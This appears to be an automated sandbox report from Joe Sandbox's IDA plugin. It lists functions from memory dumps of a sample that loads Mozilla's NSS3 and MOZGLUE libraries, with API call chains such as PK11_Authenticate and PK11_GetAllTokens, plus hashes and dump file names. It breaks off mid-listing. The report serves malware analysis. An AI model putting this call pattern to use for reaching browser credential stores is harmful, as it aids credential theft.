Opcode ID: 17012362e8e67251e79c0c79b0cdb0c4d21d191e5bac892feca81c4436c8aa0f
Instruction ID: dd27a7acc6cae3ce7bedaf0a2cd4ab01620c413da61ed1eaa5f1133eae64b2b6
Opcode Fuzzy Hash: 17012362e8e67251e79c0c79b0cdb0c4d21d191e5bac892feca81c4436c8aa0f
Instruction Fuzzy Hash: 02315C759086058FDB05EF69D48466EBBF0FF88355F12492ED9898B610EB30E891CB92

Function 6D544FB0 Relevance: 6.1, APIs: 4, Instructions: 75COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(?,00000000,00000000,00000000,?,6D54B60F,00000000), ref: 6D545003
EnterCriticalSection.KERNEL32(?,?,00000000,00000000,00000000,?,6D54B60F,00000000), ref: 6D54501C
PR_Unlock.NSS3(?,?,?,00000000,00000000,00000000,?,6D54B60F,00000000), ref: 6D54504B
free.MOZGLUE(?,00000000,00000000,00000000,?,6D54B60F,00000000), ref: 6D545064

Memory Dump Source

Source File: 0000000E.00000002.3245470365.000000006D481000.00000020.00000001.01000000.0000001C.sdmp, Offset: 6D480000, based on PE: true

Associated: 0000000E.00000002.3245278272.000000006D480000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247311062.000000006D61F000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247819676.000000006D65E000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248022740.000000006D65F000.00000008.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248173444.000000006D660000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248328320.000000006D665000.00000002.00000001.01000000.0000001C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6d480000_232a1df2aa.jbxd

Similarity

API ID: CriticalEnterSectionUnlockValuefree
String ID:
API String ID: 1112172411-0
Opcode ID: 443f3af2b01f4958472cdc257b78c2a22009f151b2d17d8aad5ab69d90c8e890
Instruction ID: 4012b3485efd1f6d906d9019da4879e1a79b7f7e32b7c51e0693f8ff20381960
Opcode Fuzzy Hash: 443f3af2b01f4958472cdc257b78c2a22009f151b2d17d8aad5ab69d90c8e890
Instruction Fuzzy Hash: DB3126B4A04606DFDB04EF69C484A6ABBF4FF48300B018969E959DB704E730E890CBD2

Function 6D569F80 Relevance: 6.1, APIs: 4, Instructions: 74memoryCOMMON

Download Yara Rule

APIs

PORT_ArenaMark_Util.NSS3(?,6D56A71A,FFFFFFFF,?,?), ref: 6D569FAB

Part of subcall function 6D5614C0: TlsGetValue.KERNEL32 ref: 6D5614E0
Part of subcall function 6D5614C0: EnterCriticalSection.KERNEL32 ref: 6D5614F5
Part of subcall function 6D5614C0: PR_Unlock.NSS3 ref: 6D56150D

PORT_ArenaGrow_Util.NSS3(?,?,?,00000000,6D56A71A,6D56A71A,00000000), ref: 6D569FD9

Part of subcall function 6D561340: TlsGetValue.KERNEL32(?,00000000,00000000,?,6D50895A,00000000,?,00000000,?,00000000,?,00000000,?,6D4FF599,?,00000000), ref: 6D56136A
Part of subcall function 6D561340: EnterCriticalSection.KERNEL32(B8AC9BDF,?,6D50895A,00000000,?,00000000,?,00000000,?,00000000,?,6D4FF599,?,00000000), ref: 6D56137E
Part of subcall function 6D561340: PL_ArenaGrow.NSS3(?,6D4FF599,?,00000000,?,6D50895A,00000000,?,00000000,?,00000000,?,00000000,?,6D4FF599,?), ref: 6D5613CF
Part of subcall function 6D561340: PR_Unlock.NSS3(?,?,6D50895A,00000000,?,00000000,?,00000000,?,00000000,?,6D4FF599,?,00000000), ref: 6D56145C

PORT_ArenaAlloc_Util.NSS3(?,00000008,6D56A71A,6D56A71A,00000000), ref: 6D56A009
PR_SetError.NSS3(FFFFE013,00000000,6D56A71A,6D56A71A,00000000), ref: 6D56A045

Memory Dump Source

Source File: 0000000E.00000002.3245470365.000000006D481000.00000020.00000001.01000000.0000001C.sdmp, Offset: 6D480000, based on PE: true

Associated: 0000000E.00000002.3245278272.000000006D480000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247311062.000000006D61F000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247819676.000000006D65E000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248022740.000000006D65F000.00000008.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248173444.000000006D660000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248328320.000000006D665000.00000002.00000001.01000000.0000001C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6d480000_232a1df2aa.jbxd

Similarity

API ID: Arena$Util$CriticalEnterSectionUnlockValue$Alloc_ErrorGrowGrow_Mark_
String ID:
API String ID: 3535121653-0
Opcode ID: 6d1ae70d6311bc2b933261b9cebe50cfeb7780cc980ad09fb36ff6f910e61e20
Instruction ID: 6275b8b4399e00248ec4da6fd4ac0c9ccd35761824f667242770343a2d646cb6
Opcode Fuzzy Hash: 6d1ae70d6311bc2b933261b9cebe50cfeb7780cc980ad09fb36ff6f910e61e20
Instruction Fuzzy Hash: 0421C5B4600257ABF7088F15DC40F36B7A9FF81369F018228D91987BA1F775E814CBA0

Function 6D572DF0 Relevance: 6.1, APIs: 4, Instructions: 72memoryCOMMON

Download Yara Rule

APIs

PORT_ArenaMark_Util.NSS3(?), ref: 6D572E08

Part of subcall function 6D5614C0: TlsGetValue.KERNEL32 ref: 6D5614E0
Part of subcall function 6D5614C0: EnterCriticalSection.KERNEL32 ref: 6D5614F5
Part of subcall function 6D5614C0: PR_Unlock.NSS3 ref: 6D56150D

PORT_NewArena_Util.NSS3(00000400), ref: 6D572E1C
PORT_ArenaAlloc_Util.NSS3(00000000,00000064), ref: 6D572E3B
PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6D572E95

Part of subcall function 6D561200: TlsGetValue.KERNEL32(00000000,00000000,00000000,?,6D5088A4,00000000,00000000), ref: 6D561228
Part of subcall function 6D561200: EnterCriticalSection.KERNEL32(B8AC9BDF), ref: 6D561238
Part of subcall function 6D561200: PL_ClearArenaPool.NSS3(00000000,00000000,00000000,00000000,00000000,?,6D5088A4,00000000,00000000), ref: 6D56124B
Part of subcall function 6D561200: PR_CallOnce.NSS3(6D662AA4,6D5612D0,00000000,00000000,00000000,?,6D5088A4,00000000,00000000), ref: 6D56125D
Part of subcall function 6D561200: PL_FreeArenaPool.NSS3(00000000,00000000,00000000), ref: 6D56126F
Part of subcall function 6D561200: free.MOZGLUE(00000000,?,00000000,00000000), ref: 6D561280
Part of subcall function 6D561200: PR_Unlock.NSS3(00000000,?,?,00000000,00000000), ref: 6D56128E
Part of subcall function 6D561200: DeleteCriticalSection.KERNEL32(0000001C,?,?,?,00000000,00000000), ref: 6D56129A
Part of subcall function 6D561200: free.MOZGLUE(00000000,?,?,?,00000000,00000000), ref: 6D5612A1

Memory Dump Source

Source File: 0000000E.00000002.3245470365.000000006D481000.00000020.00000001.01000000.0000001C.sdmp, Offset: 6D480000, based on PE: true

Associated: 0000000E.00000002.3245278272.000000006D480000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247311062.000000006D61F000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247819676.000000006D65E000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248022740.000000006D65F000.00000008.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248173444.000000006D660000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248328320.000000006D665000.00000002.00000001.01000000.0000001C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6d480000_232a1df2aa.jbxd

Similarity

API ID: ArenaUtil$CriticalSection$Arena_EnterFreePoolUnlockValuefree$Alloc_CallClearDeleteMark_Once
String ID:
API String ID: 1441289343-0
Opcode ID: f90256335fee6aeeaa24d2f6bee3f354c0acb0369ebf8db753efb3bf32d612af
Instruction ID: d1641837857574253ee04db442c53985496669a3af014f3fdf583d83fd4002e6
Opcode Fuzzy Hash: f90256335fee6aeeaa24d2f6bee3f354c0acb0369ebf8db753efb3bf32d612af
Instruction Fuzzy Hash: AD2126B1D143814BEB24CF149C40B7A3764AFE130CF224269DE089B652F7B1EA8482A2

Function 6D5069B0 Relevance: 6.1, APIs: 4, Instructions: 67memoryCOMMON

Download Yara Rule

APIs

PORT_ArenaAlloc_Util.NSS3(6D506AB7,0000000C,00000001,00000000,?,?,6D506AB7,?,00000000,?), ref: 6D5069CE

Part of subcall function 6D5610C0: TlsGetValue.KERNEL32(?,6D508802,00000000,00000008,?,6D4FEF74,00000000), ref: 6D5610F3
Part of subcall function 6D5610C0: EnterCriticalSection.KERNEL32(?,?,6D508802,00000000,00000008,?,6D4FEF74,00000000), ref: 6D56110C
Part of subcall function 6D5610C0: PL_ArenaAllocate.NSS3(?,?,?,6D508802,00000000,00000008,?,6D4FEF74,00000000), ref: 6D561141
Part of subcall function 6D5610C0: PR_Unlock.NSS3(?,?,?,6D508802,00000000,00000008,?,6D4FEF74,00000000), ref: 6D561182
Part of subcall function 6D5610C0: TlsGetValue.KERNEL32(?,6D508802,00000000,00000008,?,6D4FEF74,00000000), ref: 6D56119C

SEC_ASN1EncodeItem_Util.NSS3(6D506AB7,0000001C,00000004,?,00000001,00000000), ref: 6D506A06
SEC_ASN1EncodeItem_Util.NSS3(6D506AB7,?,00000000,?,00000001,00000000,?,?,6D506AB7,?,00000000,?), ref: 6D506A2D
PR_SetError.NSS3(FFFFE005,00000000,00000001,00000000,?,?,6D506AB7,?,00000000,?), ref: 6D506A42

Memory Dump Source

Source File: 0000000E.00000002.3245470365.000000006D481000.00000020.00000001.01000000.0000001C.sdmp, Offset: 6D480000, based on PE: true

Associated: 0000000E.00000002.3245278272.000000006D480000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247311062.000000006D61F000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247819676.000000006D65E000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248022740.000000006D65F000.00000008.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248173444.000000006D660000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248328320.000000006D665000.00000002.00000001.01000000.0000001C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6d480000_232a1df2aa.jbxd

Similarity

API ID: Util$ArenaEncodeItem_Value$Alloc_AllocateCriticalEnterErrorSectionUnlock
String ID:
API String ID: 4031546487-0
Opcode ID: a5aaeb679193f849c5750c65d2d3ed45a5b2ac39330861600183869211b5d4aa
Instruction ID: 0f93ae09d2b985d3f7967ad975397fde0377c13de07857c187f3c7e00d71296f
Opcode Fuzzy Hash: a5aaeb679193f849c5750c65d2d3ed45a5b2ac39330861600183869211b5d4aa
Instruction Fuzzy Hash: 1411C171604302EFE718EE25DC80B7773ACEB84258F01C929EE19C7A01E330E890C6E0

Function 6D52ACB0 Relevance: 6.1, APIs: 4, Instructions: 66COMMON

Download Yara Rule

APIs

CERT_NewCertList.NSS3 ref: 6D52ACC2

Part of subcall function 6D502F00: PORT_NewArena_Util.NSS3(00000800), ref: 6D502F0A
Part of subcall function 6D502F00: PORT_ArenaAlloc_Util.NSS3(00000000,0000000C), ref: 6D502F1D

Part of subcall function 6D502AE0: PORT_Strdup_Util.NSS3(?,?,?,?,?,6D500A1B,00000000), ref: 6D502AF0
Part of subcall function 6D502AE0: tolower.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6D502B11

CERT_DestroyCertList.NSS3(00000000), ref: 6D52AD5E

Part of subcall function 6D5457D0: PK11_GetAllTokens.NSS3(000000FF,00000000,00000000,6D50B41E,00000000,00000000,?,00000000,?,6D50B41E,00000000,00000000,00000001,?), ref: 6D5457E0
Part of subcall function 6D5457D0: free.MOZGLUE(00000000,00000000,00000000,00000001,?), ref: 6D545843

CERT_DestroyCertList.NSS3(?), ref: 6D52AD36

Part of subcall function 6D502F50: CERT_DestroyCertificate.NSS3(?), ref: 6D502F65
Part of subcall function 6D502F50: PORT_FreeArena_Util.NSS3(?,00000000), ref: 6D502F83

free.MOZGLUE(?), ref: 6D52AD4F

Memory Dump Source

Source File: 0000000E.00000002.3245470365.000000006D481000.00000020.00000001.01000000.0000001C.sdmp, Offset: 6D480000, based on PE: true

Associated: 0000000E.00000002.3245278272.000000006D480000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247311062.000000006D61F000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247819676.000000006D65E000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248022740.000000006D65F000.00000008.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248173444.000000006D660000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248328320.000000006D665000.00000002.00000001.01000000.0000001C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6d480000_232a1df2aa.jbxd

Similarity

API ID: Util$CertDestroyList$Arena_free$Alloc_ArenaCertificateFreeK11_Strdup_Tokenstolower
String ID:
API String ID: 132756963-0
Opcode ID: 3891b509841ddd8c8fb2930060fd2dc6d638ce300e4c3f0d201a37057a8038fe
Instruction ID: 856a063d3e216840f1028a768108b3347be9ccc0761789ed3c076c4932cb8525
Opcode Fuzzy Hash: 3891b509841ddd8c8fb2930060fd2dc6d638ce300e4c3f0d201a37057a8038fe
Instruction Fuzzy Hash: 5A21E7B1C042148BEF18DF65D8459BEB7B4EF49348F064068D905BBA41FB31AE59CBE2

Function 6D553C80 Relevance: 6.1, APIs: 4, Instructions: 65COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 6D553C9E
EnterCriticalSection.KERNEL32(?), ref: 6D553CAE
PR_Unlock.NSS3(?), ref: 6D553CEA
PR_SetError.NSS3(00000000,00000000), ref: 6D553D02

Memory Dump Source

Source File: 0000000E.00000002.3245470365.000000006D481000.00000020.00000001.01000000.0000001C.sdmp, Offset: 6D480000, based on PE: true

Associated: 0000000E.00000002.3245278272.000000006D480000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247311062.000000006D61F000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247819676.000000006D65E000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248022740.000000006D65F000.00000008.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248173444.000000006D660000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248328320.000000006D665000.00000002.00000001.01000000.0000001C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6d480000_232a1df2aa.jbxd

Similarity

API ID: CriticalEnterErrorSectionUnlockValue
String ID:
API String ID: 284873373-0
Opcode ID: bdb539917913b499a32d2a83fd00e2749446cc927fa42e5978884e121a2bdb24
Instruction ID: 51eb7ed18ff9d69aa79b50b4730e88c569fae37a75029ab08d2a37327f716cf1
Opcode Fuzzy Hash: bdb539917913b499a32d2a83fd00e2749446cc927fa42e5978884e121a2bdb24
Instruction Fuzzy Hash: 0B11E139904215AFEB05DF24DC49AAA3778EF49364F058461ED098B712E731ED50CBE1

Function 6D55ECB0 Relevance: 6.1, APIs: 4, Instructions: 64memoryCOMMON

Download Yara Rule

APIs

PORT_NewArena_Util.NSS3(00000800,?,00000001,?,6D55F0AD,6D55F150,?,6D55F150,?,?,?), ref: 6D55ECBA

Part of subcall function 6D560FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6D5087ED,00000800,6D4FEF74,00000000), ref: 6D561000
Part of subcall function 6D560FF0: PR_NewLock.NSS3(?,00000800,6D4FEF74,00000000), ref: 6D561016
Part of subcall function 6D560FF0: PL_InitArenaPool.NSS3(00000000,security,6D5087ED,00000008,?,00000800,6D4FEF74,00000000), ref: 6D56102B

PORT_ArenaAlloc_Util.NSS3(00000000,00000028,?,?,?), ref: 6D55ECD1

Part of subcall function 6D5610C0: TlsGetValue.KERNEL32(?,6D508802,00000000,00000008,?,6D4FEF74,00000000), ref: 6D5610F3
Part of subcall function 6D5610C0: EnterCriticalSection.KERNEL32(?,?,6D508802,00000000,00000008,?,6D4FEF74,00000000), ref: 6D56110C
Part of subcall function 6D5610C0: PL_ArenaAllocate.NSS3(?,?,?,6D508802,00000000,00000008,?,6D4FEF74,00000000), ref: 6D561141
Part of subcall function 6D5610C0: PR_Unlock.NSS3(?,?,?,6D508802,00000000,00000008,?,6D4FEF74,00000000), ref: 6D561182
Part of subcall function 6D5610C0: TlsGetValue.KERNEL32(?,6D508802,00000000,00000008,?,6D4FEF74,00000000), ref: 6D56119C

PORT_ArenaAlloc_Util.NSS3(00000000,0000003C,?,?,?,?,?), ref: 6D55ED02

Part of subcall function 6D5610C0: PL_ArenaAllocate.NSS3(?,6D508802,00000000,00000008,?,6D4FEF74,00000000), ref: 6D56116E

PORT_FreeArena_Util.NSS3(00000000,00000000,?,?,?,?,?), ref: 6D55ED5A

Memory Dump Source

Source File: 0000000E.00000002.3245470365.000000006D481000.00000020.00000001.01000000.0000001C.sdmp, Offset: 6D480000, based on PE: true

Associated: 0000000E.00000002.3245278272.000000006D480000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247311062.000000006D61F000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247819676.000000006D65E000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248022740.000000006D65F000.00000008.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248173444.000000006D660000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248328320.000000006D665000.00000002.00000001.01000000.0000001C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6d480000_232a1df2aa.jbxd

Similarity

API ID: Arena$Util$Alloc_AllocateArena_Value$CriticalEnterFreeInitLockPoolSectionUnlockcalloc
String ID:
API String ID: 2957673229-0
Opcode ID: fde359a11de0bfe4845df7f2d5157b0e79017d69c9f1ce55be8417e26a882dd5
Instruction ID: aa67b59014e6a1da6965da26b71e009c56932a9377ad58837b2f7e02b78ec153
Opcode Fuzzy Hash: fde359a11de0bfe4845df7f2d5157b0e79017d69c9f1ce55be8417e26a882dd5
Instruction Fuzzy Hash: E621C6B1D047829BE704CF25D944B22B7E4BFE5348F16C21AE81CC7661E770E9A0C790

Function 6D52C860 Relevance: 6.1, APIs: 4, Instructions: 64threadCOMMON

Download Yara Rule

APIs

PK11_IsLoggedIn.NSS3(?,?), ref: 6D52C890

Part of subcall function 6D528F70: PK11_GetInternalKeySlot.NSS3(?,?,00000002,?,?,?,6D51DA9B,?,00000000,?,?,?,?,CE534353,?,00000007), ref: 6D528FAF
Part of subcall function 6D528F70: PR_Now.NSS3(?,?,00000002,?,?,?,6D51DA9B,?,00000000,?,?,?,?,CE534353,?,00000007), ref: 6D528FD1
Part of subcall function 6D528F70: TlsGetValue.KERNEL32(?,?,00000002,?,?,?,6D51DA9B,?,00000000,?,?,?,?,CE534353,?,00000007), ref: 6D528FFA
Part of subcall function 6D528F70: EnterCriticalSection.KERNEL32(?,?,?,00000002,?,?,?,6D51DA9B,?,00000000,?,?,?,?,CE534353,?), ref: 6D529013
Part of subcall function 6D528F70: PR_Unlock.NSS3(?,?,?,?,00000002,?,?,?,6D51DA9B,?,00000000,?,?,?,?,CE534353), ref: 6D529042
Part of subcall function 6D528F70: TlsGetValue.KERNEL32(?,?,00000002,?,?,?,6D51DA9B,?,00000000,?,?,?,?,CE534353,?,00000007), ref: 6D52905A
Part of subcall function 6D528F70: EnterCriticalSection.KERNEL32(?,?,?,00000002,?,?,?,6D51DA9B,?,00000000,?,?,?,?,CE534353,?), ref: 6D529073
Part of subcall function 6D528F70: PR_Unlock.NSS3(?,?,?,?,00000002,?,?,?,6D51DA9B,?,00000000,?,?,?,?,CE534353), ref: 6D529111

PR_GetCurrentThread.NSS3 ref: 6D52C8B2

Part of subcall function 6D5C9BF0: TlsGetValue.KERNEL32(?,?,?,6D610A75), ref: 6D5C9C07

PK11_Authenticate.NSS3(?,00000001,?), ref: 6D52C8D0
SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6D52C8EB

Memory Dump Source

Source File: 0000000E.00000002.3245470365.000000006D481000.00000020.00000001.01000000.0000001C.sdmp, Offset: 6D480000, based on PE: true

Associated: 0000000E.00000002.3245278272.000000006D480000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247311062.000000006D61F000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247819676.000000006D65E000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248022740.000000006D65F000.00000008.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248173444.000000006D660000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248328320.000000006D665000.00000002.00000001.01000000.0000001C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6d480000_232a1df2aa.jbxd

Similarity

API ID: K11_Value$CriticalEnterSectionUnlock$AuthenticateCurrentInternalItem_LoggedSlotThreadUtilZfree
String ID:
API String ID: 999015661-0
Opcode ID: 477a7ae121ca17423d818f87d30b67f1952193dc40be73abf14df5b980759708
Instruction ID: 9c1436e864db1311cef075974e1c5facf99872b81fc5a4f00eb1330ab9db1367
Opcode Fuzzy Hash: 477a7ae121ca17423d818f87d30b67f1952193dc40be73abf14df5b980759708
Instruction Fuzzy Hash: 2301DF76E0411277D70915F45C80A7F3A699F85158F054435FE08A7A83F765CD1C93E2

Function 6D554900 Relevance: 6.1, APIs: 4, Instructions: 63COMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE09A,00000000,00000004,6D53C79F,?,?,6D555C4A,?), ref: 6D554950

Part of subcall function 6D558800: TlsGetValue.KERNEL32(?,6D56085A,00000000,?,6D508369,?), ref: 6D558821
Part of subcall function 6D558800: TlsGetValue.KERNEL32(?,?,6D56085A,00000000,?,6D508369,?), ref: 6D55883D
Part of subcall function 6D558800: EnterCriticalSection.KERNEL32(?,?,?,6D56085A,00000000,?,6D508369,?), ref: 6D558856
Part of subcall function 6D558800: PR_WaitCondVar.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,00000013,?), ref: 6D558887
Part of subcall function 6D558800: PR_Unlock.NSS3(?,?,?,?,6D56085A,00000000,?,6D508369,?), ref: 6D558899

TlsGetValue.KERNEL32(?,?,?), ref: 6D55496A
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 6D55497A
PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?,?), ref: 6D554989

Memory Dump Source

Source File: 0000000E.00000002.3245470365.000000006D481000.00000020.00000001.01000000.0000001C.sdmp, Offset: 6D480000, based on PE: true

Associated: 0000000E.00000002.3245278272.000000006D480000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247311062.000000006D61F000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247819676.000000006D65E000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248022740.000000006D65F000.00000008.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248173444.000000006D660000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248328320.000000006D665000.00000002.00000001.01000000.0000001C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6d480000_232a1df2aa.jbxd

Similarity

API ID: Value$CriticalEnterSectionUnlock$CondErrorWait
String ID:
API String ID: 3904631464-0
Opcode ID: 5d22f21161ca2fa130c1bfe376c4cefb85ec111cd419f103ca422f8fd76a9712
Instruction ID: 96b918036108a10658e8cf077b94653d92096784ec998a124399912d413be57a
Opcode Fuzzy Hash: 5d22f21161ca2fa130c1bfe376c4cefb85ec111cd419f103ca422f8fd76a9712
Instruction Fuzzy Hash: CE112E759041419BEF169F25DC42B3677B8FF4B358B054836DA4997A11FB21E8308792

Function 6D58EDB0 Relevance: 6.1, APIs: 4, Instructions: 62memoryCOMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE013,00000000,00000000,00000000,6D577FFA,?,6D579767,?,8B7874C0,0000A48E), ref: 6D58EDD4
realloc.MOZGLUE(C7C1920F,?,00000000,00000000,6D577FFA,?,6D579767,?,8B7874C0,0000A48E), ref: 6D58EDFD
PORT_Alloc_Util.NSS3(?,00000000,00000000,6D577FFA,?,6D579767,?,8B7874C0,0000A48E), ref: 6D58EE14

Part of subcall function 6D560BE0: malloc.MOZGLUE(6D558D2D,?,00000000,?), ref: 6D560BF8
Part of subcall function 6D560BE0: TlsGetValue.KERNEL32(6D558D2D,?,00000000,?), ref: 6D560C15

memcpy.VCRUNTIME140(?,?,6D579767,00000000,00000000,6D577FFA,?,6D579767,?,8B7874C0,0000A48E), ref: 6D58EE33

Memory Dump Source

Source File: 0000000E.00000002.3245470365.000000006D481000.00000020.00000001.01000000.0000001C.sdmp, Offset: 6D480000, based on PE: true

Associated: 0000000E.00000002.3245278272.000000006D480000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247311062.000000006D61F000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247819676.000000006D65E000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248022740.000000006D65F000.00000008.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248173444.000000006D660000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248328320.000000006D665000.00000002.00000001.01000000.0000001C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6d480000_232a1df2aa.jbxd

Similarity

API ID: Alloc_ErrorUtilValuemallocmemcpyrealloc
String ID:
API String ID: 3903481028-0
Opcode ID: b83372a440de0718021827ad2e9fd103ebf00e110b88cb4676452d9083422fb7
Instruction ID: f4a899b653cc6e139549993249f3a1a6c674cacbd7566146ac02cf33ca21781d
Opcode Fuzzy Hash: b83372a440de0718021827ad2e9fd103ebf00e110b88cb4676452d9083422fb7
Instruction Fuzzy Hash: A611E5B1A04727ABEB109E65DCC4B16B3B8FF04359F114835ED19C6A02E332F864C7A1

Function 6D5549C0 Relevance: 6.1, APIs: 4, Instructions: 61COMMON

Download Yara Rule

APIs

Part of subcall function 6D558800: TlsGetValue.KERNEL32(?,6D56085A,00000000,?,6D508369,?), ref: 6D558821
Part of subcall function 6D558800: TlsGetValue.KERNEL32(?,?,6D56085A,00000000,?,6D508369,?), ref: 6D55883D
Part of subcall function 6D558800: EnterCriticalSection.KERNEL32(?,?,?,6D56085A,00000000,?,6D508369,?), ref: 6D558856
Part of subcall function 6D558800: PR_WaitCondVar.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,00000013,?), ref: 6D558887
Part of subcall function 6D558800: PR_Unlock.NSS3(?,?,?,?,6D56085A,00000000,?,6D508369,?), ref: 6D558899

PR_SetError.NSS3 ref: 6D554A10
TlsGetValue.KERNEL32(6D54781D,?,6D53BD28,00CD52E8,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6D554A24
EnterCriticalSection.KERNEL32(?,?,?,6D53BD28,00CD52E8), ref: 6D554A39
PR_Unlock.NSS3(?,?,?,?,6D53BD28,00CD52E8), ref: 6D554A4E

Memory Dump Source

Source File: 0000000E.00000002.3245470365.000000006D481000.00000020.00000001.01000000.0000001C.sdmp, Offset: 6D480000, based on PE: true

Associated: 0000000E.00000002.3245278272.000000006D480000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247311062.000000006D61F000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247819676.000000006D65E000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248022740.000000006D65F000.00000008.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248173444.000000006D660000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248328320.000000006D665000.00000002.00000001.01000000.0000001C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6d480000_232a1df2aa.jbxd

Similarity

API ID: Value$CriticalEnterSectionUnlock$CondErrorWait
String ID:
API String ID: 3904631464-0
Opcode ID: 194bd261779814cf39449a6294ed3848db001f2d47eda23ff3aa35a00d4b58ea
Instruction ID: ff2d908a39ad9c7e8807e9525060172fc105d3d5fd5f56ab361a5a0413ccff03
Opcode Fuzzy Hash: 194bd261779814cf39449a6294ed3848db001f2d47eda23ff3aa35a00d4b58ea
Instruction Fuzzy Hash: A5215E759086018FDB15EF79C48562AB7F4FF8A354B064D6AD9C58BB01EB30E860CB82

Function 6D528DD0 Relevance: 6.1, APIs: 4, Instructions: 53COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 6D528DE7
EnterCriticalSection.KERNEL32 ref: 6D528DFC
